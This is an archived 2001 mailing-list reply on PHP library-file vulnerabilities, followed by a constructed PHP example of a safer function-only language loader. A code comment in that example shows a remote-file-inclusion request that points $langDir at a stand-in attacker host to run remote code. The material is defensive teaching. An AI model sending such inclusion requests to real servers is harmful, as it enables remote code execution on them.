Re: A Study In Scarlet - Exploiting Common Vulnerabilities in P

From: Forrest J Cavalier III (forrestat_private)
Date: Tue Jul 03 2001 - 07:25:36 PDT


    Shaun Clowes writes.
    
    [snip]
    
    > 6. Library Files
    
    [snip]
    
    > When libdir/loadlanguage.php is called in the defined context of main.php it is
    > perfectly safe. But because libdir/loadlanguage has the extension .php (it
    > doesn't have to have that extension, include() works on any file) it can be
    > requested and executed by a remote attacker. When out of context an attacker
    > can set $langDir and $userLang to whatever they wish.
    > 
    
    I find it good practice that PHP included files have ONLY
    function definitions (and perhaps some assignments of
    global configuration variables).
    
    The reason is that when such a file is requested directly,
    no actions are taken. The result is a blank document.
    
    Thank you for sharing a very nice summary paper.
    
    Forrest J. Cavalier III, Mib Software  Voice 570-992-8824 
    http://www.rocketaware.com/ has over 30,000 links to  
    source, libraries, functions, applications, and documentation.   
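An added illustration of the practice recommended in this reply, written for this archive page as a constructed example; it is not code from Shaun Clowes' paper, from the application it describes, or from the author of the reply. The file name, the function name `load_language`, the allow-list of language codes and the "each language file returns an array" convention are assumptions. The allow-list goes slightly beyond the reply, which only argues for keeping actions out of file scope; it is the check a caller would still want, because a function-only library file protects against direct requests, not against bad arguments from main.php.

```php
<?php
// lib/loadlanguage.php (constructed example, modern PHP syntax)

// Unsafe shape, as the quoted paper describes: an include() executed at
// file scope on variables the library expects main.php to have set.
// With register_globals enabled, requesting this file directly as
//   /lib/loadlanguage.php?langDir=http://attacker.example/&userLang=evil
// fills $langDir and $userLang from the query string before this line
// runs, so the server fetches and executes attacker-chosen code.
//
//   include("$langDir/$userLang.php");

// Safer shape: nothing but a function definition at file scope. A direct
// request to this file runs no code and returns an empty document.
// Function parameters are local, so register_globals cannot reach them.

function load_language($langDir, $userLang)
{
    // Hypothetical allow-list; a real application would build it from the
    // language files it actually ships. Rejecting anything else also keeps
    // "../" sequences and remote URLs away from include().
    static $known = array('en', 'de', 'fr');
    if (!in_array($userLang, $known, true)) {
        $userLang = 'en';
    }

    $path = $langDir . '/' . $userLang . '.php';
    if (!is_file($path)) {
        return array();
    }

    // Assumption: each language file ends with "return array(...)".
    $strings = include $path;
    return is_array($strings) ? $strings : array();
}

// main.php, the only intended caller, chooses the directory itself and
// passes the user's input only as the language name:
//
//   require_once __DIR__ . '/lib/loadlanguage.php';
//   $strings = load_language(__DIR__ . '/lang',
//                            isset($_GET['lang']) ? $_GET['lang'] : 'en');
```

One caveat for a file that holds only function definitions: including it twice raises a fatal "cannot redeclare" error, so the caller should use require_once (or include_once) rather than a plain include.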
    



    This archive was generated by hypermail 2b30 : Tue Jul 03 2001 - 13:34:18 PDT